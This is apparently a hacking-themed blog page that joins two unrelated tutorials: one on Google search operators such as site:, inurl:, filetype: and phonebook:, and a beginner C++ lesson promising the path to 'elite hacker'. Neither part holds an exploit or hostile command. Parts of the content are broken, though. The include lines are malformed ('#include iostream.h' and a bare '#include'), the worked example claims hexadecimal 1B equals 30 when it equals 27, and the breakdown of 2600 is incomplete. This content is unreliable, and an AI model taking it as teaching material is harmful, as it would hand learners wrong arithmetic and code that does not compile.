site: hackthenet.blogspot.com
site:edu
site:nc.us

inurl:
restricts your search to the URLs of web pages. This syntax tends to work well for finding search and help pages, because they tend to be rather regular in composition.
example:
inurl:help
You’ll see that using the inurl: query instead of the site: query has one immediate advantage you can use it to search subdirectories. While the http:// prefix in a URL is ignored by Google when used with site:, search results come up short when including it in an inurl: query. Be sure to remove prefixes in any inurl: query for the best (read: any) results.

You can also use inurl: in combination with the site: syntax to draw out information on subdomains. For example, how many subdomains does google.com really have? A quick query will help you figure that out:
example:
site:google.com -inurl:www.google.com
This query asks Google to list all pages from the google.com domain, but leave out those pages which are from the common subdomain www, since you already know about that one
Do you ever wonder how many subdomains google has.I wondered!!!!

cache:
cache: finds a copy of the page that Google indexed even if that page is no longer available at its original URL or has since changed its content completely.
example:
cache:hackthenet.blogspot.com
If Google returns a result that appears to have little to do with your query, you’re almost sure to find what you’re looking for in the latest cached version of the page at Google. The Google cache is particularly useful for retrieving a previous version of a page that changes often.

filetype:
filetype: searches the suffixes or filename extensions. These are usually, but not necessarily, different file types; filetype:htm and filetype:html will give you different result counts, even though they’re the same file type. You can even search for different page generators—such as ASP, PHP, CGI, and so forth—presuming the site isn’t hiding them behind redirection and proxying. Google indexes several different Microsoft formats, including PowerPoint (.ppt), Excel (.xls), and Word (.doc).
examples:
“learn java” filetype:pdf
“IT books” filetype:doc

related:
related:, as you might expect, finds pages that are related to the specified page. This is a good way to find categories of pages; a search for related:google.com returns a variety of search engines, including Lycos, Yahoo!, and Northern Light.
examples:
related:www.yahoo.com
related:www.cnn.com
While an increasingly rare occurrence, you’ll find that not all pages are related to other pages.

info:
info: provides a page of links to more information about a specified URL. This information includes a link to the URL’s cache, a list of pages that link to the URL, pages that are related to the URL, and pages that contain the URL.
examples:
info:www.hackthenet.blogspot.com
info:www.nytimes.com/technology

Note that this information is dependent on whether Google has indexed the specified URL; if not information will obviously be far more limited.

phonebook:
This Syntex as you might expect, looks up phone numbers.
examples:
phonebook:James Bond
phonebook:(511) 556-2725

Source: Google features

What is C++? And how to use it.



1. Introduction

1.1. Why do people program?
1.2. What is C++ & OOP?
1.3. What do I need to program?

2. Your first program


2.1. Running a C++ program
2.2. C++ program structure
2.3. Comments
2.4. Libraries
2.5. Functions
2.6. Streams
2.7. Return

3. Number Systems
3.1. Decimals
3.2. Binaries
3.3. Hexadecimals

4. Exercises

4.1. EX 1 : Running
4.2. EX 2 : Typing
4.3. EX 3 : Converting

5. What now?


5.1. Good programming sites
5.2. Good books on C++

6. What the hell it has to do with hacking.

--------------------------------------------------------------------------------


1.INTRODUCTION

1.1. Why do People Program?

Each person can have his own reason for programming but I can tell you that programming is one of the best ways to gain a deep understanding of computers and computer technology. Learning to program makes you understand why computers and computer programs work the way they do. It also puts some sense into you about how hard it is to create software.

1.2. What is C++ & OOP?

C++ is an extended version C. C was developed at Bell Labs, in 1978. The purpose was to create a simple language (simpler than assembly & machine code...) which can be used on a variety of platforms. Later in the early 1980's C was extended to C++ to create an object-oriented language. O(bject) O(riented) P(rogramming) is a style of programming in which programs are made using Classes. A class id code in a file separate from the main program - more on classes later. OOP in general & C++ in particular made it possible to handle the complexity of graphical environments. (like windows, macintosh..)

1.3. What do I need to program?

Well, you need a computer and a compiler to start with but you also need some curiosity and a lot of time. I guess(!?) you have a computer. You can find different compilers for free from borlands website (Check 5.1). If you have the curiosity but lack in time read stuff at lessons and detention hours. Read whenever you find time. Having a good C++ book (check 5.2) also helps a lot. (and is much better for your eyes) One thing not to forget: No tutorial, book, program or course makes you a programmer in 5 days. YOU make yourself a programmer. NO compiler writes an entire program for you, YOU write the program.

2. YOUR FIRST PROGRAM

2.1. Running a C++ Program


Read this part carefully: A C++ program must be compiled and linked before it can be executed, or run, on the computer. A great lot of compilers do this automatically. So what is a compiler? A compiler is a program that translates C++ code into machine language. Machine language is the language consisting of 1s and 0s, and is the native language of a computer. A typed C++ program is called the source-code, and the compiled code is called the object code.

Before the object code can be executed, it must be linked to other pieces of code (e.g. included libraries) used by the program. The compiled & linked program is called an executable file. Finally, the program is executed by the system. It's output is displayed in a window.

2.2. C++ Program Structure


All C++ progs contain statements (commands) that tell the computer what to do. Here is an example of a simple C++ program:
Code:
/* Downloaded from code.box.sk
We own you program */
#include iostream.h
int main()
{
    cout<<"We own you";          // the first statement
    return(0);                          // the second statement
}
Run the program. It should display :

We own you

The structure of a simple C++ program is:
Code:
/* Comments : Name, purpose of the program
    your name, date, etc.    */
    #include 
    int main()
    {
    statements; // comments
    return(0);
    }

Now we will have a closer look on the structure:

2.3. Comments
Comments are used to explain the contents of a program for a human reader. The computer ignores them. The symbols /* and */ are used for the beginning and end of a comment for multi-line comments. // symbols are also used for commenting. All characters on a line after the // symbol are considered to be comments and are ignored. Most newbies think that commenting a program is a waste of time. They are wrong. Commenting is very important because it makes the code understandable by other programmers and makes it easier to improve a program or fix the bugs in it. You'll understand better after trying to decipher a hundred pages of code you wrote a few months later.

2.4. Libraries

Look at the program above. Following the opening comment was the line:

#include
 

This line simply tells the computer that the iostream library is needed therefore it should be included. A library is a collection of program code that can be included (and used) in a program to perform a variety of tasks. iostream is a library - also called as a header file, look at its extension - used to perform input/output (I/O) stream tasks. There are a lot of non-commercial C++ libraries for various purposes written by good guys who spent more than enough time in front of their computers. You can find them at code.box.sk. Also references to all libraries used in the tutorials can be found on the net.

2.5. Functions


The next line in the program was:

int main()

Which is the header of the main function. Makes sense? No? A function is a set of statements that accomplish a task. A function header includes the return type of the function and the function name. As shown in the main() header, main returns an integer(int) through return(0). So all the functions that have an integer as the return type returns integers. Very clear. The statements in a function (in this case the main function) are enclosed in curly braces. The { and } symbols indicates the beginning and the end of statements. More on functions later.

2.6. Streams

What is a stream? In C++ input/output devices are called streams. cout (we used above) is the c(onsole) out(put) stream, and the send (insertion) operator is used to send the data "We own you" into the stream. In the first statement:

cout<<"We own you";

The words following the << operator are put in quotation marks(") to form a string. When run, the string We own you is sent to the console output device. Yes, it is also called the computer screen.

Important note: C++ is case sensitive. That means cout and Cout is not the same thing.

2.7. Return

The second statement was:

return(0);

which causes the program to terminate sending the value 0 to the computer. The value "0" indicates that the program terminated without error.

Note: The statements end with a semicolon ( ; ). A semicolon in C++ indicate the end of a statement.

3. DATA & NUMBER SYSTEMS

3.1. Decimals

The base 10 number system. Uses 10 digits: 0 to 9. Numbers raised to the zero power is equal to one. For example: 5 to the power 0 = 1. Base ten equivalent of the number

2600 = 2 x (10 to the power 3) + 6 x (10 to the power 2)
33 = 3 x (10 to the power 1) + 3 x (10 to the power 0)

3.2. Binaries

The base 2 number system. Uses 2 digits : 0 and 1. Works the same as base 10 except we multiply numbers by the powers of 2 instead. For example 110 is equal to 6 in base 10:

110 = 1 x (2 to the power 2) + 1 x (2 to the power 1) = 6(base10)

3.3. Hexadecimal


The base 16 number system. Uses 16 digits. 0 to 9 & "A" to "F". Works the same as base 10 & base two except the numbers are multiplied by the powers of 16 instead:

1B = 1 x (16 to the power 1) + 2(B) x (16 to the power of 0) = 30(base10)

4. EXERCISES

4.1. Running

Find & install a compiler, type the example program and run it. Pretty simple but be sure the syntax is correct.

4.2. Typing

Make a program which displays your name without looking to this tutorial. Makes you learn a lot better.

4.3. Converting

Convert these to decimals : 110101, 001101, 10101110
Convert these to hexadecimals : 234, 324, 19394
Convert these to binaries : 2F, 1B3, 234, 125


5. WHAT NOW?

5.1. Good programming related sites

Here are a few good sites about programming:

http://code.box.sk
 --> Very good content. Has message boards.
http://www.borland.com --> Free, shareware & commercial compilers.
http://www.cprogramming.com --> Some original tuts.
http://www.planet-source-code.com --> One of the biggest code archive.


5.2. Good books on C++


Printed:
C++ - How to Program One of the best books written on C. Great for all levels of programming.
C++: The complete reference An overall C++ & STL reference
A Guide to Programming in C++, Lawrenceville Press My first book on C++, "borrowed" lots of definitions from there  :)

Online books:
Thinking in C++ is nearly the best one on C++, a must-read. You can find many online netbooks from code.box.sk


6. What the hell it has to do with Hacking

Fist of all you people should should know that at this time you are called Script Kiddie Hackers who use others written software to hack. But to become a elite Hacker you should know how to program and C++ is a good language for that.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | cna certification